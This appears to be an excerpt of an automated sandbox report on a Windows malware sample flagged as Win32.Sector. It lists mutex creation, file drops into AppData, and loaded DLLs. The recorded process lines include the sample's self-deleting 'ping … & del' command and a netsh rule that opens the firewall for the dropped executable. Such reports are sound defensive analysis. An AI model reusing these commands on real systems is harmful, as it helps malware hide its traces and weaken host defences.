        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5408_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1928_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3512_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2424_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3904_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_6940_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1836_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2256_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1800_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3932_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2680_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_732_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1156_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7148_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1972_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5884_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1692_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7164_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3340_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7140_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5860_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1160_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5084_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_6720_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_1852_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6620_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1348_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_660_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1336_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6248_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2024_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6088_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6660_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2052_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_792_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_2200_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1036_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_632_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_6380_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5796_
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMutant created: \Sessions\1\BaseNamedObjects\Z0BAZwxx
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3440_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2056_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4912_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_6160_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2884_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4812_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2860_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2168_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_4696_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3768_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6676_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_968_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3400_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1392_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_436_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2736_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5688_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_5016_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6136_
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2708_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1504_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1936_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_6352_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2104_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6844_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2500_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1616_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1148_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3916_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5808_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3596_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3520_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7000_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3200_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1640_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1220_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1680_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_7020_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1792_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1408_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_2780_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_4068_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4336_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6188_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_928_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1028_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_584_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6176_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sppsvc.exeM_4576_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_764_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_640_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3296_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1124_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5320_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_7132_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3332_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1584_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_652_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2072_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6228_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2300_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6260_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4472_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4852_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1568_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2648_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_6264_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_376_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5384_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2608_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2192_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_4244_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2432_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1248_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6336_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1656_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_2992_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_4228_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4160_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3452_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_1004_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_880_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3032_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2756_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_5644_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5572_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_1284_
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3132_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_992_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_1420_
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Local\Temp\winfpnht.exeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile read: C:\Windows\system.iniJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT [OperationOrder], [Id], [OperationType], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [CreatedTime], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [CorrelationVector], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [OriginalPayload], [OriginalLastModifiedOnClient], [UploadAllowedByPolicy], [PatchFields], [ThrottleReleaseTime], [OperationExpirationTime], [GroupItems], [DdsDeviceId]FROM [ActivityOperation] Dk;O
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeReversingLabs: Detection: 94%
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeString found in binary or memory: F-STOPW.
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeSection loaded: rasadhlp.dllJump to behavior
